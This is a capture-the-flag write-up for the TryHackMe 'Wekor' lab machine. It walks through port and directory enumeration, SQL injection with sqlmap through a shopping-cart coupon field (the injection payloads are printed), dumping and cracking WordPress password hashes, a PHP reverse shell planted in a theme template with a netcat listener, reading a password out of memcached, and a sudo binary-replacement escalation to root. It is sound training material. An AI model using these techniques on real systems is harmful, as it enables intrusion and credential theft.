Try HackMe Wekor Writeup
TryHackMe: Wekor created by @ustoun0
The creator give us many hints on this room, starting with the room description, notes and flag hints.
Room decription:
CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services
Notes:
Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you
enjoy it as it is my first time ever creating something like this !This CTF is focused primarily on enumeration, better understanding of services
and thinking out of the box for some parts of this machine.Feel free to ask any questions…It’s okay to be confused in some parts of the
boxJust a quick note, Please use the domain : “wekor.thm” as it could be useful
later on in the box
Flag hints:
What is the user flag?
Hint: Look at what ports are open
what
what thing
More (Definitions, Synonyms, Translation)What is the root flag?
Hint: Sudo -l
Let’s get down to business, shall we?
Before start, add wekor.thm domain to /etc/hosts
echo "[IP] wekor.thm" | sudo tee -a /etc/hosts
Enumeration
sudo nmap -v -sS -sV -T4 --open -Pn -p- wekor.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are 2 open ports. Port 22 is used for SSH and port 80 for Apache Web Server.
I try access FTP with anonoymous account, but anonymous account was disabled.
Retrieve webserver starter page.
curl -v http://wekor.thm/
* Trying 10.10.17.203:80...
* Connected to wekor.thm (10.10.17.203) port 80 (#0)
> GET / HTTP/1.1
> Host: wekor.thm
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 08 Mar 2021 20:51:10 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Sun, 12 Jul 2020 00:29:54 GMT
< ETag: "17-5aa33ac47e480"
< Accept-Ranges: bytes
< Content-Length: 23
< Content-Type: text/html
<
Welcome Internet User!
* Connection #0 to host wekor.thm left intact
Exploring the team site
feroxbuster -q -u http://wekor.thm -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -x php,html,txt
200 10l 20w 188c http://wekor.thm/robots.txt
200 7l 31w 190c http://wekor.thm/comingreallysoon/index.html
200 1l 3w 23c http://wekor.thm/index.html
Let’s check what we found.
curl http://wekor.thm/comingreallysoon/index.html
Welcome Dear Client!
We've setup our latest website on /it-next, Please go check it out!
If you have any comments or suggestions, please tweet them to @faketwitteraccount!
Thanks a lot !
* Connection #0 to host wekor.thm left intact
curl http://wekor.thm/robots.txt
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
Opening /it-next in the browser.
What we have at http://wekor.thm/it-next? It’s look like some html template,but, internal links are PHP pages.
Maybe the SQLi from room descriptions canbe somewhere hidded here.
I spend many hours fuzzing directories, but the rabbit hole was always near.
SQLMap exploration
sqlmap -u http://wekor.thm/it-next --batch --dbms=mysql --risk 3 --crawl=4 --forms
After some time SQLMap show that SQL injection vulnerability has been detected against ‘wekor.thm’ as below.
POST http://wekor.thm/it-next/it_cart.php
POST data: coupon_code=&apply_coupon=Apply%20Coupon
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: coupon_code=&apply_coupon=Apply%20Coupon] (Warning: blank fields detected): coupon_code=&apply_coupon=Apply Coupon
do you want to fill blank fields with random values? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: coupon_code (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: coupon_code=JlIv' OR NOT 7432=7432#&apply_coupon=Apply Coupon
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: coupon_code=JlIv' AND GTID_SUBSET(CONCAT(0x71716b7671,(SELECT (ELT(9501=9501,1))),0x7170706271),9501)-- vrEO&apply_coupon=Apply Coupon
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: coupon_code=JlIv' AND (SELECT 6261 FROM (SELECT(SLEEP(5)))PtyT)-- HgoQ&apply_coupon=Apply Coupon
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: coupon_code=JlIv' UNION ALL SELECT NULL,CONCAT(0x71716b7671,0x7a4942504f474f495461514f43644c4a6e566c644a695
852787450507557784a61796c5356497a6d,0x7170706271),NULL#&apply_coupon=
Apply Coupon
Now let’s look what databases whe have
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" --dbs
[...]
[16:23:33] [INFO] fetching database names
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[16:23:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/wekor.thm'
[*] ending @ 16:23:33 /2021-03-08/
We have two databases, one is coupons and other other is wordpress. Let’s dumpthose databases and see if we can find some credentials, and where are thewordpress installed.
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables
[...]
Database: coupons
[1 table]
+---------------+
| valid_coupons |
+---------------+
[...]
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables --dump
[...]
Table: valid_coupons
[1 entry]
+----+--------+---------------+
| id | coupon | expire_date |
+----+--------+---------------+
| 1 | 12345 | doesnotexpire |
+----+--------+---------------+
[...]
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress --tables
[...]
Database: wordpress
[12 tables]
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress -T wp_users --dump
[...]
Database: wordpress
Table: wp_users
[4 entries]
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1 | http://site.wekor.thm/wordpress | $P$____________HASH_______31B. | admin@wekor.thm | admin | 0 | admin | admin | 2021-01-21 20:33:37 | <blank> |
| 5743 | http://jeffrey.com | $P$_______HASH________j10 | jeffrey@wekor.thm | wp_jeffrey | 0 | wp jeffrey | wp_jeffrey | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
| 5773 | http://yura.com | $P$B_________HASH________SV/ | yura@wekor.thm | wp_yura | 0 | wp yura | wp_yura | 2021-01-21 20:35:27 | <blank> |
| 5873 | http://eagle.com | $P$B________HASH_______6QY/ | eagle@wekor.thm | wp_eagle | 0 | wp eagle | wp_eagle | 2021-01-21 20:36:11 | <blank> |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
So, now we have credentials and the wordpress address at site.wekor.thm.
Let’s add site.wekor.thm to /etc/hosts file and see how it appear.
echo "[IP] site.wekor.thm" | sudo tee -a /etc/hosts
We already have some credentials, next step is using john with the wordlist rockyou to crack those hashes.
cat hashes
admin:$P$____________HASH_______31B.
wp_jeffrey:$P$_______HASH________j10
wp_yura:$P$B_________HASH________SV/
wp_eagle:$P$B________HASH_______6QY/
john --wordlist=/usr/share/wordlists/rockyou.txt ./hashes
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Remaining 1 password hash
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:26 DONE (2021-03-08 18:25) 0g/s 28315p/s 28315c/s 28315C/s !!!@@@!!!..*7¡Vamos!
Session completed
After a while, john broke three hashes.
john ./hashes --show
wp_jeffrey:PASSWORD_TEXT
wp_yura:PASSWORD_TEXT
wp_eagle:PASSWORD_TEXT
3 password hashes cracked, 1 left
Yura is the wordpress admin. Next step is install the reverse shell inside wordpress.
Change the host IP in the file
/usr/share/webshells/php/php-reverse-shell.php with your VPN IP.
After that open wordpress in “Theme Editor”, select the file “404 Template”.
Replace the content of the file with the reverse shell file and
save.
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
Open local netcat and make a request to stabilish the connection.
Open one terminal window and set netcat.
nc -nvlp 1234
Open other terminal and call open some page that does not exit.
curl http://site.wekor.thm/wordpress/index.php/xyz
Now we have a shell session.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ groups
www-data
What users we have?
www-data@osboxes:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
Orka:x:1001:1001::/home/Orka:/bin/bash
Only Orka and root are have shell config.
Looking for open ports you can find something running in port 11211.
netstat -lptu
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 localhost:mysql *:* LISTEN -
tcp 0 0 localhost:11211 *:* LISTEN -
tcp 0 0 *:ssh *:* LISTEN -
tcp 0 0 localhost:ipp *:* LISTEN -
tcp 0 0 localhost:3010 *:* LISTEN -
tcp6 0 0 [::]:http [::]:* LISTEN -
tcp6 0 0 [::]:ssh [::]:* LISTEN -
tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN -
udp 0 0 *:ipp *:* -
udp 0 0 *:mdns *:* -
udp 0 0 *:43825 *:* -
udp 0 0 *:bootpc *:* -
udp6 0 0 [::]:mdns [::]:* -
udp6 0 0 [::]:50771 [::]:*
After searching in Google we discover that is a memcached server. Some moresearches and we got the command to dump the cached data.
/usr/share/memcached/scripts/memcached-tool localhost:11211 dump
Dumping memcache contents
Number of buckets: 1
Number of items : 5
Dumping bucket 1 - 5 total items
add salary 0 1615235112 8
$100,000
add password 0 1615235112 15
---->PASSWORD_TEXT<-----
add email 0 1615235112 14
Orka@wekor.thm
add id 0 1615235112 4
3476
add username 0 1615235112 4
Orka
Ok, now we have Orka password.
As Orka, what you can do?
sudo -l
[sudo] password for Orka:
Matching Defaults entries for Orka on osboxes:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Orka may run the following commands on osboxes:
(root) /home/Orka/Desktop/bitcoin
Orka@osboxes:/tmp$ ls -lha /home/Orka/Desktop/bitcoin
-rwxr-xr-x 1 root root 7.6K Jan 23 15:23 /home/Orka/Desktop/bitcoin
ls -la /home/Orka/Desktop/
total 2176
drwxrwxr-x 2 Orka Orka 4096 Mar 8 17:52 .
drwxr-xr-- 19 Orka Orka 4096 Mar 8 17:49 ..
-rwxr-xr-x 1 Orka Orka 1109564 Mar 8 17:52 bitcoin
You can execute bitcoin as sudo. Also you can’t change bitcoin but, you are canchange the Desktop folder. Let’s replace the bitcoin with bash and get the root.
Orka@osboxes:/tmp$ cd /home/Orka/
Orka@osboxes:~$ mv Desktop d
Orka@osboxes:~$ mkdir Desktop
Orka@osboxes:~$ cp /bin/bash ./Desktop/bitcoin
Orka@osboxes:~$ sudo /home/Orka/Desktop/bitcoin
root@osboxes:~# cat /root/root.txt
FLAG_TEXT
root@osboxes:~# cat /home/Orka/user.txt
FLAG_TEXT
